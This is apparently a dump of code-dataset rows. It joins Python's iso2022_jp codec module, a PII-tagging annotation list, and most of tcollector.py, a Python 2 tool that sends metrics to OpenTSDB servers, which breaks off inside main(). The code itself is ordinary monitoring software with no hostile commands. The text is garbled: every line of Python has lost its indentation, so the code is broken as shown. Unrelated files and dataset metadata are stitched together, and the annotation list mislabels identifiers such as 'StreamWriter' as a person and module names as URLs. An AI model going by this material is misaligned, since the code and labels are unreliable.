# Written by Hye-Shik Chang dummy@email.com
#
import _codecs_iso2022, codecs
import _multibytecodec as mbc
codec = _codecs_iso2022.getcodec('iso2022_jp')
class Codec(codecs.Codec):
encode = codec.encode
decode = codec.decode
class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,
codecs.IncrementalEncoder):
codec = codec
class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,
codecs.IncrementalDecoder):
codec = codec
class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):
codec = codec
class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):
codec = codec
def getregentry():
return codecs.CodecInfo(
name='iso2022_jp',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
>>>>>>> PI:KEY
| 3,219 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Hye-Shik Chang'], ['LOCATION', 'multibytecodec'], ['NRP', 'IncrementalEncoder(mbc'], ['PERSON', 'StreamWriter'], ['LOCATION', 'streamwriter'], ['PERSON', 'Hye-Shik Chang'], ['LOCATION', 'multibytecodec'], ['NRP', 'IncrementalEncoder(mbc'], ['PERSON', 'StreamWriter'], ['LOCATION', 'streamwriter'], ['PERSON', 'Hye-Shik Chang'], ['LOCATION', 'multibytecodec'], ['NRP', 'IncrementalEncoder(mbc'], ['PERSON', 'StreamWriter'], ['LOCATION', 'streamwriter'], ['URL', 'jp.py'], ['URL', 'email.com'], ['URL', 'iso2022.ge'], ['URL', 'codecs.Co'], ['URL', 'codec.de'], ['URL', 'mbc.Mu'], ['URL', 'codecs.In'], ['URL', 'mbc.Mu'], ['URL', 'codecs.In'], ['URL', 'mbc.Mu'], ['URL', 'codecs.St'], ['URL', 'mbc.Mu'], ['URL', 'codecs.St'], ['URL', 'codecs.Co'], ['URL', 'jp.py'], ['URL', 'email.com'], ['URL', 'iso2022.ge'], ['URL', 'codecs.Co'], ['URL', 'codec.de'], ['URL', 'mbc.Mu'], ['URL', 'codecs.In'], ['URL', 'mbc.Mu'], ['URL', 'codecs.In'], ['URL', 'mbc.Mu'], ['URL', 'codecs.St'], ['URL', 'mbc.Mu'], ['URL', 'codecs.St'], ['URL', 'codecs.Co'], ['URL', 'jp.py'], ['URL', 'email.com'], ['URL', 'iso2022.ge'], ['URL', 'codecs.Co'], ['URL', 'codec.de'], ['URL', 'mbc.Mu'], ['URL', 'codecs.In'], ['URL', 'mbc.Mu'], ['URL', 'codecs.In'], ['URL', 'mbc.Mu'], ['URL', 'codecs.St'], ['URL', 'mbc.Mu'], ['URL', 'codecs.St'], ['URL', 'codecs.Co']] |
14 | #!/usr/bin/env python
# This file is part of tcollector.
# Copyright (C) 2010 The tcollector Authors.
#
# This program is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or (at your
# option) any later version. This program is distributed in the hope that it
# will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty
# of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser
# General Public License for more details. You should have received a copy
# of the GNU Lesser General Public License along with this program. If not,
# see <http://www.gnu.org/licenses/>.
#
# tcollector.py
#
"""Simple manager for collection scripts that run and gather data.
The tcollector gathers the data and sends it to the TSD for storage."""
#
# by Mark Smith dummy@email.com.
#
import atexit
import errno
import fcntl
import logging
import os
import random
import re
import signal
import socket
import subprocess
import sys
import threading
import time
import json
import urllib2
import base64
from logging.handlers import RotatingFileHandler
from Queue import Queue
from Queue import Empty
from Queue import Full
from optparse import OptionParser
# global variables.
COLLECTORS = {}
GENERATION = 0
DEFAULT_LOG = '/var/log/tcollector.log'
LOG = logging.getLogger('tcollector')
ALIVE = True
# If the SenderThread catches more than this many consecutive uncaught
# exceptions, something is not right and tcollector will shutdown.
# Hopefully some kind of supervising daemon will then restart it.
MAX_UNCAUGHT_EXCEPTIONS = 100
DEFAULT_PORT = 4242
MAX_REASONABLE_TIMESTAMP = 1600000000 # Good until September 2020 :)
# How long to wait for datapoints before assuming
# a collector is dead and restarting it
ALLOWED_INACTIVITY_TIME = 600 # seconds
MAX_SENDQ_SIZE = 10000
MAX_READQ_SIZE = 100000
def register_collector(collector):
"""Register a collector with the COLLECTORS global"""
assert isinstance(collector, Collector), "collector=%r" % (collector,)
# store it in the global list and initiate a kill for anybody with the
# same name that happens to still be hanging around
if collector.name in COLLECTORS:
col = COLLECTORS[collector.name]
if col.proc is not None:
LOG.error('%s still has a process (pid=%d) and is being reset,'
' terminating', col.name, col.proc.pid)
col.shutdown()
COLLECTORS[collector.name] = collector
class ReaderQueue(Queue):
"""A Queue for the reader thread"""
def nput(self, value):
"""A nonblocking put, that simply logs and discards the value when the
queue is full, and returns false if we dropped."""
try:
self.put(value, False)
except Full:
LOG.error("DROPPED LINE: %s", value)
return False
return True
class Collector(object):
"""A Collector is a script that is run that gathers some data
and prints it out in standard TSD format on STDOUT. This
class maintains all of the state information for a given
collector and gives us utility methods for working with
it."""
def __init__(self, colname, interval, filename, mtime=0, lastspawn=0):
"""Construct a new Collector."""
self.name = colname
self.interval = interval
self.filename = filename
self.lastspawn = lastspawn
self.proc = None
self.nextkill = 0
self.killstate = 0
self.dead = False
self.mtime = mtime
self.generation = GENERATION
self.buffer = ""
self.datalines = []
# Maps (metric, tags) to (value, repeated, line, timestamp) where:
# value: Last value seen.
# repeated: boolean, whether the last value was seen more than once.
# line: The last line that was read from that collector.
# timestamp: Time at which we saw the value for the first time.
# This dict is used to keep track of and remove duplicate values.
# Since it might grow unbounded (in case we see many different
# combinations of metrics and tags) someone needs to regularly call
# evict_old_keys() to remove old entries.
self.values = {}
self.lines_sent = 0
self.lines_received = 0
self.lines_invalid = 0
self.last_datapoint = int(time.time())
def read(self):
"""Read bytes from our subprocess and store them in our temporary
line storage buffer. This needs to be non-blocking."""
# we have to use a buffer because sometimes the collectors
# will write out a bunch of data points at one time and we
# get some weird sized chunk. This read call is non-blocking.
# now read stderr for log messages, we could buffer here but since
# we're just logging the messages, I don't care to
try:
out = self.proc.stderr.read()
if out:
LOG.debug('reading %s got %d bytes on stderr',
self.name, len(out))
for line in out.splitlines():
LOG.warning('%s: %s', self.name, line)
except IOError, (err, msg):
if err != errno.EAGAIN:
raise
except:
LOG.exception('uncaught exception in stderr read')
# we have to use a buffer because sometimes the collectors will write
# out a bunch of data points at one time and we get some weird sized
# chunk. This read call is non-blocking.
try:
self.buffer += self.proc.stdout.read()
if len(self.buffer):
LOG.debug('reading %s, buffer now %d bytes',
self.name, len(self.buffer))
except IOError, (err, msg):
if err != errno.EAGAIN:
raise
except AttributeError:
# sometimes the process goes away in another thread and we don't
# have it anymore, so log an error and bail
LOG.exception('caught exception, collector process went away while reading stdout')
except:
LOG.exception('uncaught exception in stdout read')
return
# iterate for each line we have
while self.buffer:
idx = self.buffer.find('\n')
if idx == -1:
break
# one full line is now found and we can pull it out of the buffer
line = self.buffer[0:idx].strip()
if line:
self.datalines.append(line)
self.last_datapoint = int(time.time())
self.buffer = self.buffer[idx+1:]
def collect(self):
"""Reads input from the collector and returns the lines up to whomever
is calling us. This is a generator that returns a line as it
becomes available."""
while self.proc is not None:
self.read()
if not len(self.datalines):
return
while len(self.datalines):
yield self.datalines.pop(0)
def shutdown(self):
"""Cleanly shut down the collector"""
if not self.proc:
return
try:
if self.proc.poll() is None:
kill(self.proc)
for attempt in range(5):
if self.proc.poll() is not None:
return
LOG.info('Waiting %ds for PID %d (%s) to exit...'
% (5 - attempt, self.proc.pid, self.name))
time.sleep(1)
kill(self.proc, signal.SIGKILL)
self.proc.wait()
except:
# we really don't want to die as we're trying to exit gracefully
LOG.exception('ignoring uncaught exception while shutting down')
def evict_old_keys(self, cut_off):
"""Remove old entries from the cache used to detect duplicate values.
Args:
cut_off: A UNIX timestamp. Any value that's older than this will be
removed from the cache.
"""
for key in self.values.keys():
time = self.values[key][3]
if time < cut_off:
del self.values[key]
class StdinCollector(Collector):
"""A StdinCollector simply reads from STDIN and provides the
data. This collector presents a uniform interface for the
ReaderThread, although unlike a normal collector, read()/collect()
will be blocking."""
def __init__(self):
super(StdinCollector, self).__init__('stdin', 0, '<stdin>')
# hack to make this work. nobody else will rely on self.proc
# except as a test in the stdin mode.
self.proc = True
def read(self):
"""Read lines from STDIN and store them. We allow this to
be blocking because there should only ever be one
StdinCollector and no normal collectors, so the ReaderThread
is only serving us and we're allowed to block it."""
global ALIVE
line = sys.stdin.readline()
if line:
self.datalines.append(line.rstrip())
else:
ALIVE = False
def shutdown(self):
pass
class ReaderThread(threading.Thread):
"""The main ReaderThread is responsible for reading from the collectors
and assuring that we always read from the input no matter what.
All data read is put into the self.readerq Queue, which is
consumed by the SenderThread."""
def __init__(self, dedupinterval, evictinterval):
"""Constructor.
Args:
dedupinterval: If a metric sends the same value over successive
intervals, suppress sending the same value to the TSD until
this many seconds have elapsed. This helps graphs over narrow
time ranges still see timeseries with suppressed datapoints.
evictinterval: In order to implement the behavior above, the
code needs to keep track of the last value seen for each
combination of (metric, tags). Values older than
evictinterval will be removed from the cache to save RAM.
Invariant: evictinterval > dedupinterval
"""
assert evictinterval > dedupinterval, "%r <= %r" % (evictinterval,
dedupinterval)
super(ReaderThread, self).__init__()
self.readerq = ReaderQueue(MAX_READQ_SIZE)
self.lines_collected = 0
self.lines_dropped = 0
self.dedupinterval = dedupinterval
self.evictinterval = evictinterval
def run(self):
"""Main loop for this thread. Just reads from collectors,
does our input processing and de-duping, and puts the data
into the queue."""
LOG.debug("ReaderThread up and running")
lastevict_time = 0
# we loop every second for now. ideally we'll setup some
# select or other thing to wait for input on our children,
# while breaking out every once in a while to setup selects
# on new children.
while ALIVE:
for col in all_living_collectors():
for line in col.collect():
self.process_line(col, line)
if self.dedupinterval != 0: # if 0 we do not use dedup
now = int(time.time())
if now - lastevict_time > self.evictinterval:
lastevict_time = now
now -= self.evictinterval
for col in all_collectors():
col.evict_old_keys(now)
# and here is the loop that we really should get rid of, this
# just prevents us from spinning right now
time.sleep(1)
def process_line(self, col, line):
"""Parses the given line and appends the result to the reader queue."""
self.lines_collected += 1
col.lines_received += 1
if len(line) >= 1024: # Limit in net.opentsdb.tsd.PipelineFactory
LOG.warning('%s line too long: %s', col.name, line)
col.lines_invalid += 1
return
parsed = re.match('^([-_./a-zA-Z0-9]+)\s+' # Metric name.
'(\d+\.?\d+)\s+' # Timestamp.
'(\S+?)' # Value (int or float).
'((?:\s+[-_./a-zA-Z0-9]+=[-_./a-zA-Z0-9]+)*)$', # Tags
line)
if parsed is None:
LOG.warning('%s sent invalid data: %s', col.name, line)
col.lines_invalid += 1
return
metric, timestamp, value, tags = parsed.groups()
timestamp = int(timestamp)
# If there are more than 11 digits we're dealing with a timestamp
# with millisecond precision
if len(str(timestamp)) > 11:
global MAX_REASONABLE_TIMESTAMP
MAX_REASONABLE_TIMESTAMP = MAX_REASONABLE_TIMESTAMP * 1000
# De-dupe detection... To reduce the number of points we send to the
# TSD, we suppress sending values of metrics that don't change to
# only once every 10 minutes (which is also when TSD changes rows
# and how much extra time the scanner adds to the beginning/end of a
# graph interval in order to correctly calculate aggregated values).
# When the values do change, we want to first send the previous value
# with what the timestamp was when it first became that value (to keep
# slopes of graphs correct).
#
if self.dedupinterval != 0: # if 0 we do not use dedup
key = (metric, tags)
if key in col.values:
# if the timestamp isn't > than the previous one, ignore this value
if timestamp <= col.values[key][3]:
LOG.error("Timestamp out of order: metric=%s%s,"
" old_ts=%d >= new_ts=%d - ignoring data point"
" (value=%r, collector=%s)", metric, tags,
col.values[key][3], timestamp, value, col.name)
col.lines_invalid += 1
return
elif timestamp >= MAX_REASONABLE_TIMESTAMP:
LOG.error("Timestamp is too far out in the future: metric=%s%s"
" old_ts=%d, new_ts=%d - ignoring data point"
" (value=%r, collector=%s)", metric, tags,
col.values[key][3], timestamp, value, col.name)
return
# if this data point is repeated, store it but don't send.
# store the previous timestamp, so when/if this value changes
# we send the timestamp when this metric first became the current
# value instead of the last. Fall through if we reach
# the dedup interval so we can print the value.
if (col.values[key][0] == value and
(timestamp - col.values[key][3] < self.dedupinterval)):
col.values[key] = (value, True, line, col.values[key][3])
return
# we might have to append two lines if the value has been the same
# for a while and we've skipped one or more values. we need to
# replay the last value we skipped (if changed) so the jumps in
# our graph are accurate,
if ((col.values[key][1] or
(timestamp - col.values[key][3] >= self.dedupinterval))
and col.values[key][0] != value):
col.lines_sent += 1
if not self.readerq.nput(col.values[key][2]):
self.lines_dropped += 1
# now we can reset for the next pass and send the line we actually
# want to send
# col.values is a dict of tuples, with the key being the metric and
# tags (essentially the same as wthat TSD uses for the row key).
# The array consists of:
# [ the metric's value, if this value was repeated, the line of data,
# the value's timestamp that it last changed ]
col.values[key] = (value, False, line, timestamp)
col.lines_sent += 1
if not self.readerq.nput(line):
self.lines_dropped += 1
class SenderThread(threading.Thread):
"""The SenderThread is responsible for maintaining a connection
to the TSD and sending the data we're getting over to it. This
thread is also responsible for doing any sort of emergency
buffering we might need to do if we can't establish a connection
and we need to spool to disk. That isn't implemented yet."""
def __init__(self, reader, dryrun, hosts, self_report_stats, tags,
reconnectinterval=0, http=False, http_username=None,
http_password=None, ssl=False, maxtags=8):
"""Constructor.
Args:
reader: A reference to a ReaderThread instance.
dryrun: If true, data points will be printed on stdout instead of
being sent to the TSD.
hosts: List of (host, port) tuples defining list of TSDs
self_report_stats: If true, the reader thread will insert its own
stats into the metrics reported to TSD, as if those metrics had
been read from a collector.
http: A boolean that controls whether or not the http endpoint is used.
ssl: A boolean that controls whether or not the http endpoint uses ssl.
tags: A dictionary of tags to append for every data point.
"""
super(SenderThread, self).__init__()
self.dryrun = dryrun
self.reader = reader
self.tags = sorted(tags.items()) # dictionary transformed to list
self.http = http
self.http_username = http_username
self.http_password = http_password
self.ssl = ssl
self.hosts = hosts # A list of (host, port) pairs.
# Randomize hosts to help even out the load.
random.shuffle(self.hosts)
self.blacklisted_hosts = set() # The 'bad' (host, port) pairs.
self.current_tsd = -1 # Index in self.hosts where we're at.
self.host = None # The current TSD host we've selected.
self.port = None # The port of the current TSD.
self.tsd = None # The socket connected to the aforementioned TSD.
self.last_verify = 0
self.reconnectinterval = reconnectinterval # in seconds.
self.time_reconnect = 0 # if reconnectinterval > 0, used to track the time.
self.sendq = []
self.self_report_stats = self_report_stats
self.maxtags = maxtags # The maximum number of tags TSD will accept.
def pick_connection(self):
"""Picks up a random host/port connection."""
# Try to get the next host from the list, until we find a host that
# isn't in the blacklist, or until we run out of hosts (i.e. they
# are all blacklisted, which typically happens when we lost our
# connectivity to the outside world).
for self.current_tsd in xrange(self.current_tsd + 1, len(self.hosts)):
hostport = self.hosts[self.current_tsd]
if hostport not in self.blacklisted_hosts:
break
else:
LOG.info('No more healthy hosts, retry with previously blacklisted')
random.shuffle(self.hosts)
self.blacklisted_hosts.clear()
self.current_tsd = 0
hostport = self.hosts[self.current_tsd]
self.host, self.port = hostport
LOG.info('Selected connection: %s:%d', self.host, self.port)
def blacklist_connection(self):
"""Marks the current TSD host we're trying to use as blacklisted.
Blacklisted hosts will get another chance to be elected once there
will be no more healthy hosts."""
# FIXME: Enhance this naive strategy.
LOG.info('Blacklisting %s:%s for a while', self.host, self.port)
self.blacklisted_hosts.add((self.host, self.port))
def run(self):
"""Main loop. A simple scheduler. Loop waiting for 5
seconds for data on the queue. If there's no data, just
loop and make sure our connection is still open. If there
is data, wait 5 more seconds and grab all of the pending data and
send it. A little better than sending every line as its
own packet."""
errors = 0 # How many uncaught exceptions in a row we got.
while ALIVE:
try:
self.maintain_conn()
try:
line = self.reader.readerq.get(True, 5)
except Empty:
continue
self.sendq.append(line)
time.sleep(5) # Wait for more data
while True:
# prevents self.sendq fast growing in case of sending fails
# in send_data()
if len(self.sendq) > MAX_SENDQ_SIZE:
break
try:
line = self.reader.readerq.get(False)
except Empty:
break
self.sendq.append(line)
if ALIVE:
self.send_data()
errors = 0 # We managed to do a successful iteration.
except (ArithmeticError, EOFError, EnvironmentError, LookupError,
ValueError), e:
errors += 1
if errors > MAX_UNCAUGHT_EXCEPTIONS:
shutdown()
raise
LOG.exception('Uncaught exception in SenderThread, ignoring')
time.sleep(1)
continue
except:
LOG.exception('Uncaught exception in SenderThread, going to exit')
shutdown()
raise
def verify_conn(self):
"""Periodically verify that our connection to the TSD is OK
and that the TSD is alive/working."""
# http connections don't need this
if self.http:
return True
if self.tsd is None:
return False
# if the last verification was less than a minute ago, don't re-verify
if self.last_verify > time.time() - 60:
return True
# in case reconnect is activated, check if it's time to reconnect
if self.reconnectinterval > 0 and self.time_reconnect < time.time() - self.reconnectinterval:
# closing the connection and indicating that we need to reconnect.
try:
self.tsd.close()
except socket.error, msg:
pass # not handling that
self.time_reconnect = time.time()
return False
# we use the version command as it is very low effort for the TSD
# to respond
LOG.debug('verifying our TSD connection is alive')
try:
self.tsd.sendall('version\n')
except socket.error, msg:
self.tsd = None
self.blacklist_connection()
return False
bufsize = 4096
while ALIVE:
# try to read as much data as we can. at some point this is going
# to block, but we have set the timeout low when we made the
# connection
try:
buf = self.tsd.recv(bufsize)
except socket.error, msg:
self.tsd = None
self.blacklist_connection()
return False
# If we don't get a response to the `version' request, the TSD
# must be dead or overloaded.
if not buf:
self.tsd = None
self.blacklist_connection()
return False
# Woah, the TSD has a lot of things to tell us... Let's make
# sure we read everything it sent us by looping once more.
if len(buf) == bufsize:
continue
# If everything is good, send out our meta stats. This
# helps to see what is going on with the tcollector.
# TODO need to fix this for http
if self.self_report_stats:
strs = [
('reader.lines_collected',
'', self.reader.lines_collected),
('reader.lines_dropped',
'', self.reader.lines_dropped)
]
for col in all_living_collectors():
strs.append(('collector.lines_sent', 'collector='
+ col.name, col.lines_sent))
strs.append(('collector.lines_received', 'collector='
+ col.name, col.lines_received))
strs.append(('collector.lines_invalid', 'collector='
+ col.name, col.lines_invalid))
ts = int(time.time())
strout = ["tcollector.%s %d %d %s"
% (x[0], ts, x[2], x[1]) for x in strs]
for string in strout:
self.sendq.append(string)
break # TSD is alive.
# if we get here, we assume the connection is good
self.last_verify = time.time()
return True
def maintain_conn(self):
"""Safely connect to the TSD and ensure that it's up and
running and that we're not talking to a ghost connection
(no response)."""
# dry runs and http are always good
if self.dryrun or self.http:
return
# connection didn't verify, so create a new one. we might be in
# this method for a long time while we sort this out.
try_delay = 1
while ALIVE:
if self.verify_conn():
return
# increase the try delay by some amount and some random value,
# in case the TSD is down for a while. delay at most
# approximately 10 minutes.
try_delay *= 1 + random.random()
if try_delay > 600:
try_delay *= 0.5
LOG.debug('SenderThread blocking %0.2f seconds', try_delay)
time.sleep(try_delay)
# Now actually try the connection.
self.pick_connection()
try:
addresses = socket.getaddrinfo(self.host, self.port,
socket.AF_UNSPEC,
socket.SOCK_STREAM, 0)
except socket.gaierror, e:
# Don't croak on transient DNS resolution issues.
if e[0] in (socket.EAI_AGAIN, socket.EAI_NONAME,
socket.EAI_NODATA):
LOG.debug('DNS resolution failure: %s: %s', self.host, e)
continue
raise
for family, socktype, proto, canonname, sockaddr in addresses:
try:
self.tsd = socket.socket(family, socktype, proto)
self.tsd.settimeout(15)
self.tsd.connect(sockaddr)
# if we get here it connected
LOG.debug('Connection to %s was successful'%(str(sockaddr)))
break
except socket.error, msg:
LOG.warning('Connection attempt failed to %s:%d: %s',
self.host, self.port, msg)
self.tsd.close()
self.tsd = None
if not self.tsd:
LOG.error('Failed to connect to %s:%d', self.host, self.port)
self.blacklist_connection()
def add_tags_to_line(self, line):
for tag, value in self.tags:
if ' %s=' % tag not in line:
line += ' %s=%s' % (tag, value)
return line
def send_data(self):
"""Sends outstanding data in self.sendq to the TSD in one operation."""
if self.http:
return self.send_data_via_http()
# construct the output string
out = ''
# in case of logging we use less efficient variant
if LOG.level == logging.DEBUG:
for line in self.sendq:
line = "put %s" % self.add_tags_to_line(line)
out += line + "\n"
LOG.debug('SENDING: %s', line)
else:
out = "".join("put %s\n" % self.add_tags_to_line(line) for line in self.sendq)
if not out:
LOG.debug('send_data no data?')
return
# try sending our data. if an exception occurs, just error and
# try sending again next time.
try:
if self.dryrun:
print out
else:
self.tsd.sendall(out)
self.sendq = []
except socket.error, msg:
LOG.error('failed to send data: %s', msg)
try:
self.tsd.close()
except socket.error:
pass
self.tsd = None
self.blacklist_connection()
# FIXME: we should be reading the result at some point to drain
# the packets out of the kernel's queue
def send_data_via_http(self):
"""Sends outstanding data in self.sendq to TSD in one HTTP API call."""
metrics = []
for line in self.sendq:
# print " %s" % line
parts = line.split(None, 3)
# not all metrics have metric-specific tags
if len(parts) == 4:
(metric, timestamp, value, raw_tags) = parts
else:
(metric, timestamp, value) = parts
raw_tags = ""
# process the tags
metric_tags = {}
for tag in raw_tags.strip().split():
(tag_key, tag_value) = tag.split("=", 1)
metric_tags[tag_key] = tag_value
metric_entry = {}
metric_entry["metric"] = metric
metric_entry["timestamp"] = long(timestamp)
metric_entry["value"] = float(value)
metric_entry["tags"] = dict(self.tags).copy()
if len(metric_tags) + len(metric_entry["tags"]) > self.maxtags:
metric_tags_orig = set(metric_tags)
subset_metric_keys = frozenset(metric_tags[:len(metric_tags[:self.maxtags-len(metric_entry["tags"])])])
metric_tags = dict((k, v) for k, v in metric_tags.iteritems() if k in subset_metric_keys)
LOG.error("Exceeding maximum permitted metric tags - removing %s for metric %s",
str(metric_tags_orig - set(metric_tags)), metric)
metric_entry["tags"].update(metric_tags)
metrics.append(metric_entry)
if self.dryrun:
print "Would have sent:\n%s" % json.dumps(metrics,
sort_keys=True,
indent=4)
return
self.pick_connection()
# print "Using server: %s:%s" % (self.host, self.port)
# url = "http://%s:%s/api/put?details" % (self.host, self.port)
# print "Url is %s" % url
LOG.debug("Sending metrics to http://%s:%s/api/put?details",
self.host, self.port)
if self.ssl:
protocol = "https"
else:
protocol = "http"
req = urllib2.Request("%s://%s:%s/api/put?details" % (
protocol, self.host, self.port))
if self.http_username and self.http_password:
req.add_header("Authorization", "Basic %s"
% base64.b64encode("%s:%s" % (self.http_username, self.http_password)))
req.add_header("Content-Type", "application/json")
try:
response = urllib2.urlopen(req, json.dumps(metrics))
LOG.debug("Received response %s", response.getcode())
# clear out the sendq
self.sendq = []
# print "Got response code: %s" % response.getcode()
# print "Content:"
# for line in response:
# print line,
# print
except urllib2.HTTPError, e:
LOG.error("Got error %s", e)
# for line in http_error:
# print line,
def setup_logging(logfile=DEFAULT_LOG, max_bytes=None, backup_count=None):
"""Sets up logging and associated handlers."""
LOG.setLevel(logging.INFO)
if backup_count is not None and max_bytes is not None:
assert backup_count > 0
assert max_bytes > 0
ch = RotatingFileHandler(logfile, 'a', max_bytes, backup_count)
else: # Setup stream handler.
ch = logging.StreamHandler(sys.stdout)
ch.setFormatter(logging.Formatter('%(asctime)s %(name)s[%(process)d] '
'%(levelname)s: %(message)s'))
LOG.addHandler(ch)
def parse_cmdline(argv):
"""Parses the command-line."""
# get arguments
default_cdir = os.path.join(os.path.dirname(os.path.realpath(sys.argv[0])),
'collectors')
parser = OptionParser(description='Manages collectors which gather '
'data and report back.')
parser.add_option('-c', '--collector-dir', dest='cdir', metavar='DIR',
default=default_cdir,
help='Directory where the collectors are located.')
parser.add_option('-d', '--dry-run', dest='dryrun', action='store_true',
default=False,
help='Don\'t actually send anything to the TSD, '
'just print the datapoints.')
parser.add_option('-D', '--daemonize', dest='daemonize', action='store_true',
default=False, help='Run as a background daemon.')
parser.add_option('-H', '--host', dest='host', default='localhost',
metavar='HOST',
help='Hostname to use to connect to the TSD.')
parser.add_option('-L', '--hosts-list', dest='hosts', default=False,
metavar='HOSTS',
help='List of host:port to connect to tsd\'s (comma separated).')
parser.add_option('--no-tcollector-stats', dest='no_tcollector_stats',
default=False, action='store_true',
help='Prevent tcollector from reporting its own stats to TSD')
parser.add_option('-s', '--stdin', dest='stdin', action='store_true',
default=False,
help='Run once, read and dedup data points from stdin.')
parser.add_option('-p', '--port', dest='port', type='int',
default=DEFAULT_PORT, metavar='PORT',
help='Port to connect to the TSD instance on. '
'default=%default')
parser.add_option('-v', dest='verbose', action='store_true', default=False,
help='Verbose mode (log debug messages).')
parser.add_option('-t', '--tag', dest='tags', action='append',
default=[], metavar='TAG',
help='Tags to append to all timeseries we send, '
'e.g.: -t TAG=VALUE -t TAG2=VALUE')
parser.add_option('-P', '--pidfile', dest='pidfile',
default='/var/run/tcollector.pid',
metavar='FILE', help='Write our pidfile')
parser.add_option('--dedup-interval', dest='dedupinterval', type='int',
default=300, metavar='DEDUPINTERVAL',
help='Number of seconds in which successive duplicate '
'datapoints are suppressed before sending to the TSD. '
'Use zero to disable. '
'default=%default')
parser.add_option('--evict-interval', dest='evictinterval', type='int',
default=6000, metavar='EVICTINTERVAL',
help='Number of seconds after which to remove cached '
'values of old data points to save memory. '
'default=%default')
parser.add_option('--allowed-inactivity-time', dest='allowed_inactivity_time', type='int',
default=ALLOWED_INACTIVITY_TIME, metavar='ALLOWEDINACTIVITYTIME',
help='How long to wait for datapoints before assuming '
'a collector is dead and restart it. '
'default=%default')
parser.add_option('--remove-inactive-collectors', dest='remove_inactive_collectors', action='store_true',
default=False, help='Remove collectors not sending data '
'in the max allowed inactivity interval')
parser.add_option('--max-bytes', dest='max_bytes', type='int',
default=64 * 1024 * 1024,
help='Maximum bytes per a logfile.')
parser.add_option('--backup-count', dest='backup_count', type='int',
default=0, help='Maximum number of logfiles to backup.')
parser.add_option('--logfile', dest='logfile', type='str',
default=DEFAULT_LOG,
help='Filename where logs are written to.')
parser.add_option('--reconnect-interval',dest='reconnectinterval', type='int',
default=0, metavar='RECONNECTINTERVAL',
help='Number of seconds after which the connection to'
'the TSD hostname reconnects itself. This is useful'
'when the hostname is a multiple A record (RRDNS).'
)
parser.add_option('--max-tags', dest='maxtags', type=int, default=8,
help='The maximum number of tags to send to our TSD Instances')
parser.add_option('--http', dest='http', action='store_true', default=False,
help='Send the data via the http interface')
parser.add_option('--http-username', dest='http_username', default=False,
help='Username to use for HTTP Basic Auth when sending the data via HTTP')
parser.add_option('--http-password', dest='http_password', default=False,
help='Password to use for HTTP Basic Auth when sending the data via HTTP')
parser.add_option('--ssl', dest='ssl', action='store_true', default=False,
help='Enable SSL - used in conjunction with http')
(options, args) = parser.parse_args(args=argv[1:])
if options.dedupinterval < 0:
parser.error('--dedup-interval must be at least 0 seconds')
if options.evictinterval <= options.dedupinterval:
parser.error('--evict-interval must be strictly greater than '
'--dedup-interval')
if options.reconnectinterval < 0:
parser.error('--reconnect-interval must be at least 0 seconds')
# We cannot write to stdout when we're a daemon.
if (options.daemonize or options.max_bytes) and not options.backup_count:
options.backup_count = 1
return (options, args)
def daemonize():
"""Performs the necessary dance to become a background daemon."""
if os.fork():
os._exit(0)
os.chdir("/")
os.umask(022)
os.setsid()
os.umask(0)
if os.fork():
os._exit(0)
stdin = open(os.devnull)
stdout = open(os.devnull, 'w')
os.dup2(stdin.fileno(), 0)
os.dup2(stdout.fileno(), 1)
os.dup2(stdout.fileno(), 2)
stdin.close()
stdout.close()
os.umask(022)
for fd in xrange(3, 1024):
try:
os.close(fd)
except OSError: # This FD wasn't opened...
pass # ... ignore the exception.
def setup_python_path(collector_dir):
"""Sets up PYTHONPATH so that collectors can easily import common code."""
mydir = os.path.dirname(collector_dir)
libdir = os.path.join(mydir, 'collectors', 'lib')
if not os.path.isdir(libdir):
return
pythonpath = os.environ.get('PYTHONPATH', '')
if pythonpath:
pythonpath += ':'
pythonpath += mydir
os.environ['PYTHONPATH'] = pythonpath
LOG.debug('Set PYTHONPATH to %r', pythonpath)
def main(argv):
"""The main tcollector entry point and loop."""
options, args = parse_cmdline(argv)
if options.daemonize:
daemonize()
setup_logging(options.logfile, options.max_bytes or None,
options.backup_count or None)
if options.verbose:
LOG.setLevel(logging.DEBUG) # up our level
if options.pidfile:
write_pid(options.pidfile)
# validate everything
tags = {}
for tag in options.tags:
if re.match('^[-_.a-z0-9]+=\S+$', tag, re.IGNORECASE) is None:
assert False, 'Tag string "%s" is invalid.' % tag
k, v = tag.split('=', 1)
if k in tags:
assert False, 'Tag "%s" already declared.' % k
tags[k] = v
if not 'host' in tags and not options.stdin:
tags['host'] = socket.gethostname()
LOG.warning('Tag "host" not specified, defaulting to %s.', tags['host'])
options.cdir = os.path.realpath(options.cdir)
if not os.path.isdir(options.cdir):
LOG.fatal('No such directory: %s', options.cdir)
return 1
modules = load_etc_dir(options, tags)
setup_python_path(options.cdir)
# gracefully handle death for normal termination paths and abnormal
atexit.register(shutdown)
for sig in (signal.SIGTERM, signal.SIGINT):
signal.signal(sig, shutdown_signal)
# at this point we're ready to start processing, so start the ReaderThread
# so we can have it running and pulling in data for us
reader = ReaderThread(options.dedupinterval, options.evictinterval)
reader.start()
# prepare list of (host, port) of TSDs given on CLI
if not options.hosts:
options.hosts = [(options.host, options.port)]
else:
def splitHost(hostport):
if ":" in hostport:
# Check if we have an IPv6 address.
if hostport[0] == "[" and "]:" in hostport:
host, port = hostport.split("]:")
host = host[1:]
else:
host, port = hostport.split(":")
return (host, int(port))
return (hostport, DEFAULT_PORT)
options.hosts = [splitHost(host) for host in options.hosts.split(",")]
if options.host != "localhost" or options.port != DEFAULT_PORT:
options.hosts.append((options.host, options.port))
# and setup the sender to start writing out to the tsd
sender = SenderThread(reader, options.dryrun, options.hosts,
not options.no_tcollector_stats, tags, options.reconnectinterval,
options.http, options.http_username,
options.http_password, options.ssl, options.maxtags)
sender.start()
LOG.info('SenderThread startup complete')
# if we're in stdin mode, build a stdin collector and just join on the
